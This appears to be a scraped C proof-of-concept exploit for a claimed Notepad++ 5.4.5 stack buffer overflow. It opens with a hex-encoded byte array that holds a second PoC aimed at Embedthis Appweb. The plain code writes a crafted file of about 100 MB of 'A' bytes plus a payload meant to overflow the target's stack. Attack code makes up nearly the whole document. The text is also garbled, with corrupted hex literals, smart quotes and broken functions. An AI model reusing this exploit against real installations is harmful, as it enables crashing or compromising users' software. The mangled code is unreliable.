    0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79, 0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72,
    0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0x2C, 0×20, 0×68, 0×74, 0x5F, 0x6D, 0x6C, 0x2C, 0×20,
    0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66, 0×28, 0×68, 0×74, 0x5F, 0x6D, 0x6C, 0×29, 0×29, 0x3B, 0x0D,
    0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D,
    0×20, 0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66, 0×28, 0×68, 0×74, 0x5F, 0x6D, 0x6C, 0×29, 0x3B, 0×20,
    0×20, 0×20, 0×20, 0×20, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63,
    0×70, 0×79, 0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66,
    0×73, 0×65, 0×74, 0x2C, 0×20, 0×22, 0x3E, 0×22, 0x2C, 0×20, 0×31, 0×29, 0x3B, 0×20, 0x0D, 0x0A,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20,
    0×31, 0x3B, 0×20, 0×20, 0×20, 0×20, 0×20, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D,
    0×65, 0x6D, 0×63, 0×70, 0×79, 0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B,
    0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0x2C, 0×20, 0×22, 0x3C, 0×22, 0x2C, 0×20, 0×31, 0×29, 0x3B,
    0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B,
    0x3D, 0×20, 0×31, 0x3B, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x0D, 0x0A,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79, 0×28, 0x6D, 0×65, 0x6D,
    0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0x2C, 0×20, 0×68,
    0×65, 0x5F, 0×61, 0×64, 0x2C, 0×20, 0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66, 0×28, 0×68, 0×65, 0x5F,
    0×61, 0×64, 0×29, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66,
    0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20, 0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66, 0×28, 0×68, 0×65,
    0x5F, 0×61, 0×64, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D,
    0×63, 0×70, 0×79, 0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66,
    0×66, 0×73, 0×65, 0×74, 0x2C, 0×20, 0×22, 0x3E, 0×22, 0x2C, 0×20, 0×31, 0×29, 0x3B, 0×20, 0x0D,
    0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D,
    0×20, 0×31, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63, 0×70,
    0×79, 0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73,
    0×65, 0×74, 0x2C, 0×20, 0×22, 0x3C, 0×22, 0x2C, 0×20, 0×31, 0×29, 0x3B, 0×20, 0x0D, 0x0A, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20, 0×31,
    0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79, 0×28,
    0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74,
    0x2C, 0×20, 0×22, 0x5C, 0x5C, 0×22, 0x2C, 0×20, 0×31, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20, 0×31, 0x3B, 0x0D,
    0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79, 0×28, 0x6D, 0×65,
    0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0x2C, 0×20,
    0×68, 0×65, 0x5F, 0×61, 0×64, 0x2C, 0×20, 0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66, 0×28, 0×68, 0×65,
    0x5F, 0×61, 0×64, 0×29, 0×29, 0x3B, 0×20, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6F,
    0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20, 0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66, 0×28,
    0×68, 0×65, 0x5F, 0×61, 0×64, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D,
    0×65, 0x6D, 0×63, 0×70, 0×79, 0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B,
    0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0x2C, 0×20, 0×22, 0x3E, 0×22, 0x2C, 0×20, 0×31, 0×29, 0x3B,
    0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B,
    0x3D, 0×20, 0×31, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63,
    0×70, 0×79, 0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66,
    0×73, 0×65, 0×74, 0x2C, 0×20, 0×22, 0x3C, 0×22, 0x2C, 0×20, 0×31, 0×29, 0x3B, 0x0D, 0x0A, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20, 0×31,
    0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79, 0×28,
    0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74,
    0x2C, 0×20, 0×62, 0x6F, 0x5F, 0×64, 0×79, 0x2C, 0×20, 0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66, 0×28,
    0×62, 0x6F, 0x5F, 0×64, 0×79, 0×29, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20, 0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66,
    0×28, 0×62, 0x6F, 0x5F, 0×64, 0×79, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79, 0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72,
    0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0x2C, 0×20, 0×22, 0x3E, 0×22, 0x2C, 0×20, 0×31, 0×29,
    0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20,
    0x2B, 0x3D, 0×20, 0×31, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×75, 0×69, 0x6E,
    0×74, 0×38, 0x5F, 0×74, 0×20, 0×73, 0×68, 0×69, 0×74, 0x5B, 0x5D, 0×20, 0x3D, 0x7B, 0×20, 0×30,
    0×78, 0×33, 0×43, 0x2C, 0×30, 0×78, 0×36, 0×39, 0x2C, 0×30, 0×78, 0×36, 0×44, 0x2C, 0×30, 0×78,
    0×36, 0×37, 0x2C, 0×30, 0×78, 0×32, 0×30, 0x2C, 0×30, 0×78, 0×37, 0×33, 0x2C, 0×30, 0×78, 0×37,
    0×32, 0x2C, 0×30, 0×78, 0×36, 0×33, 0x2C, 0×30, 0×78, 0×33, 0×44, 0×20, 0x7D, 0x3B, 0x0D, 0x0A,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79, 0×28, 0x6D, 0×65, 0x6D,
    0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0x2C, 0×20, 0×73,
    0×68, 0×69, 0×74, 0x2C, 0×20, 0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66, 0×28, 0×73, 0×68, 0×69, 0×74,
    0×29, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65,
    0×74, 0×20, 0x2B, 0x3D, 0×20, 0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66, 0×28, 0×73, 0×68, 0×69, 0×74,
    0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×73, 0×65, 0×74,
    0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65,
    0×74, 0x2C, 0×20, 0×30, 0×78, 0×32, 0×32, 0x2C, 0×20, 0×31, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20, 0×31, 0x3B,
    0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×73, 0×65, 0×74, 0×28, 0x6D,
    0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0x2C,
    0×20, 0×30, 0×78, 0×34, 0×31, 0x2C, 0×20, 0×34, 0×36, 0×31, 0×36, 0×29, 0x3B, 0x0D, 0x0A, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20, 0×34,
    0×36, 0×31, 0×36, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×73,
    0×65, 0×74, 0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66,
    0×73, 0×65, 0×74, 0x2C, 0×20, 0×30, 0×78, 0×32, 0×32, 0x2C, 0×20, 0×31, 0×29, 0x3B, 0x0D, 0x0A,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20,
    0×31, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79,
    0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65,
    0×74, 0x2C, 0×20, 0×22, 0x3E, 0×22, 0x2C, 0×20, 0×31, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20, 0×31, 0x3B, 0x0D,
    0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79, 0×28, 0x6D, 0×65,
    0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0x2C, 0×20,
    0×22, 0x3C, 0×22, 0x2C, 0×20, 0×31, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20, 0×31, 0x3B, 0x0D, 0x0A, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79, 0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75,
    0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0x2C, 0×20, 0×22, 0x5C, 0x5C,
    0×22, 0x2C, 0×20, 0×31, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66,
    0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20, 0×31, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79, 0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66,
    0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0x2C, 0×20, 0×62, 0x6F, 0x5F, 0×64, 0×79,
    0x2C, 0×20, 0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66, 0×28, 0×62, 0x6F, 0x5F, 0×64, 0×79, 0×29, 0×29,
    0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20,
    0x2B, 0x3D, 0×20, 0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66, 0×28, 0×62, 0x6F, 0x5F, 0×64, 0×79, 0×29,
    0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79, 0×28,
    0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74,
    0x2C, 0×20, 0×22, 0x3E, 0×22, 0x2C, 0×20, 0×31, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20, 0×31, 0x3B, 0x0D, 0x0A,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79, 0×28, 0x6D, 0×65, 0x6D,
    0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0x2C, 0×20, 0×22,
    0x3C, 0×22, 0x2C, 0×20, 0×31, 0×29, 0x3B, 0×20, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20, 0×31, 0x3B, 0x0D, 0x0A, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79, 0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75,
    0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0x2C, 0×20, 0×22, 0x5C, 0x5C,
    0×22, 0x2C, 0×20, 0×31, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66,
    0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20, 0×31, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79, 0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66,
    0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0x2C, 0×20, 0×68, 0×74, 0x5F, 0x6D, 0x6C,
    0x2C, 0×20, 0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66, 0×28, 0×68, 0×74, 0x5F, 0x6D, 0x6C, 0×29, 0×29,
    0x3B, 0×20, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74,
    0×20, 0x2B, 0x3D, 0×20, 0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66, 0×28, 0×68, 0×74, 0x5F, 0x6D, 0x6C,
    0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79,
    0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2B, 0x6F, 0×66, 0×66, 0×73, 0×65,
    0×74, 0x2C, 0×20, 0×22, 0x3E, 0×22, 0x2C, 0×20, 0×31, 0×29, 0x3B, 0×20, 0×20, 0x0D, 0x0A, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x2B, 0x3D, 0×20, 0×32,
    0x3B, 0×20, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×66, 0×77, 0×72, 0×69, 0×74, 0×65,
    0×28, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2C, 0×20, 0x6F, 0×66, 0×66, 0×73,
    0×65, 0×74, 0×20, 0x2C, 0×20, 0×31, 0x2C, 0×20, 0×66, 0×29, 0x3B, 0×20, 0x0D, 0x0A, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×66, 0×77, 0×72, 0×69, 0×74, 0×65, 0×28, 0×22, 0x5C, 0×78, 0×30, 0×30,
    0×22, 0x2C, 0×20, 0×31, 0x2C, 0×20, 0×31, 0x2C, 0×20, 0×66, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×70, 0×72, 0×69, 0x6E, 0×74, 0×66, 0×28, 0×22, 0×46, 0×69, 0x6C, 0×65,
    0×20, 0×44, 0x6F, 0x6E, 0×65, 0×21, 0x5C, 0x6E, 0×22, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20,
    0×20, 0x7D, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×69, 0x6E, 0×74, 0×20, 0x6D, 0×61, 0×69,
    0x6E, 0×28, 0×69, 0x6E, 0×74, 0×20, 0×61, 0×72, 0×67, 0×63, 0x2C, 0×20, 0×63, 0×68, 0×61, 0×72,
    0×20, 0x2A, 0×61, 0×72, 0×67, 0×76, 0x5B, 0x5D, 0×29, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0x7B,
    0×20, 0×20, 0×63, 0×68, 0×61, 0×72, 0×20, 0x2A, 0×66, 0x6E, 0×61, 0x6D, 0×65, 0×20, 0x3D, 0×20,
    0×61, 0×72, 0×67, 0×76, 0x5B, 0×31, 0x5D, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×73, 0×79, 0×73, 0×74, 0×65, 0x6D, 0×28, 0×22, 0×43, 0x4C, 0×53, 0×22, 0×29, 0x3B, 0×20,
    0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×66, 0×70, 0×72, 0×69, 0x6E, 0×74, 0×66,
    0×28, 0×73, 0×74, 0×64, 0x6F, 0×75, 0×74, 0×20, 0x2C, 0×20, 0×22, 0x3A, 0x3A, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x3A, 0x3A, 0x5C, 0x6E, 0×22, 0×29, 0x3B, 0x0D, 0x0A, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×66, 0×70, 0×72, 0×69, 0x6E, 0×74, 0×66, 0×28, 0×73, 0×74,
    0×64, 0x6F, 0×75, 0×74, 0×20, 0x2C, 0×20, 0×22, 0×45, 0x6D, 0×62, 0×65, 0×64, 0×74, 0×68, 0×69,
    0×73, 0×20, 0×41, 0×70, 0×70, 0×77, 0×65, 0×62, 0×20, 0×52, 0×65, 0x6D, 0x6F, 0×74, 0×65, 0×20,
    0×53, 0×74, 0×61, 0×63, 0x6B, 0×20, 0x4F, 0×76, 0×65, 0×72, 0×66, 0x6C, 0x6F, 0×77, 0×20, 0×50,
    0x4F, 0×43, 0x5C, 0x6E, 0×22, 0×29, 0x3B, 0×20, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×66, 0×70, 0×72, 0×69, 0x6E, 0×74, 0×66, 0×28, 0×73, 0×74, 0×64, 0x6F, 0×75, 0×74, 0×20,
    0x2C, 0×20, 0×22, 0×41, 0x6C, 0x6C, 0×20, 0×43, 0×72, 0×65, 0×64, 0×69, 0×74, 0×73, 0x3A, 0×66,
    0x6C, 0×30, 0×20, 0×66, 0x6C, 0×30, 0×77, 0x5C, 0x6E, 0×22, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×66, 0×70, 0×72, 0×69, 0x6E, 0×74, 0×66, 0×28, 0×73, 0×74, 0×64,
    0x6F, 0×75, 0×74, 0×20, 0x2C, 0×20, 0×22, 0x3A, 0x3A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0x3A, 0x3A, 0x5C, 0x6E, 0×22, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×69, 0×66, 0×28, 0×61, 0×72, 0×67, 0×63, 0×20, 0x3C, 0×20, 0×32, 0×29, 0×20, 0x7B,
    0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×70, 0×72, 0×69, 0x6E, 0×74, 0×66, 0×28,
    0×22, 0×55, 0×73, 0×61, 0×67, 0×65, 0×20, 0×69, 0×73, 0×20, 0×25, 0×73, 0×20, 0×66, 0×69, 0x6C,
    0×65, 0x6E, 0×61, 0x6D, 0×65, 0x2E, 0×68, 0×74, 0x6D, 0x6C, 0x5C, 0x6E, 0×22, 0x2C, 0×20, 0×61,
    0×72, 0×67, 0×76, 0x5B, 0×30, 0x5D, 0×29, 0x3B, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×65, 0×78, 0×69, 0×74, 0×28, 0x2D, 0×31, 0×29, 0x3B, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x7D, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x0D,
    0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×46, 0×62, 0×75, 0×69, 0x6C, 0×64, 0×28, 0×66,
    0x6E, 0×61, 0x6D, 0×65, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×72,
    0×65, 0×74, 0×75, 0×72, 0x6E, 0×20, 0×30, 0x3B, 0×20, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20,
    0x7D, 0×20, 0×20, 0x0D, 0x0A,
    } ;
     size_t get_executable_path (char* buffer, size_t len)
    {
    char* path_end;
    if (readlink ("/proc/self/exe", buffer, len) <= 0)
    return -1;
    path_end = strrchr (buffer, ‘/’);
    if (path_end == NULL)
    return -1;
    ++path_end;
    *path_end = ”;
    return (size_t) (path_end – buffer);
    }
    #define STRING_SIZE 0xF4240
    #define S           0×64
    char b[STRING_SIZE];
    memset(b, 0×41, STRING_SIZE);
    FILE *f;
    f = fopen(fname, "wb");
    int i;
    for(i = 0; i < S; i++) {
    fwrite(b, sizeof(char), STRING_SIZE, f); }
    fwrite(V, sizeof(char), strlen(V), f);
    checksum(b, STRING_SIZE);
    char c[100];
    get_executable_path (c, 100);
    printf("FILE DONE !\n");
    printf("path/location of the crafted file is: %s\n", c);
    fclose(f);
    } 
    void args(int argc, char *argv[])
    {
    int file;
    int a;
    if(a)
    while((a = getopt(argc, argv, "f")) != EOF) {
    switch(a)                                     {
    case ‘f’:
    file = (int)optarg;
    break;
    default:
    exit(-1);
                                                   }
                                                     }
                                                   }
   void Usage(char *argv[])
   { printf("*************************************************\n");
     printf("Notepad++ 5.4.5 Stack Buffer Overflow\n");
     printf("Usage is:%s [option1] filename\n", argv[0]);
     printf("CREDITS:fl0 fl0w\n");
     printf("This POC is PRIVATE\n");
     printf("*************************************************\n");
   }
   void Menu(char *argv[])
   { fprintf(stderr,
    "\n"
    "\t-f       FILE.c/cpp\n"
    "\n"
    ,
    argv[0]);
    exit(-1);
   }       
    int main(int argc, char *argv[])
    { CLS(15);
    if(argc < 2) {
    Usage(argv);            
    printf("Example:\n");
    Menu(argv[0]);          
    Usage(argv);       
                 }
    args(argc, argv);                
    Buildfile(argv[2]);
    return 0;  
    }

Tagged with:
preload preload preload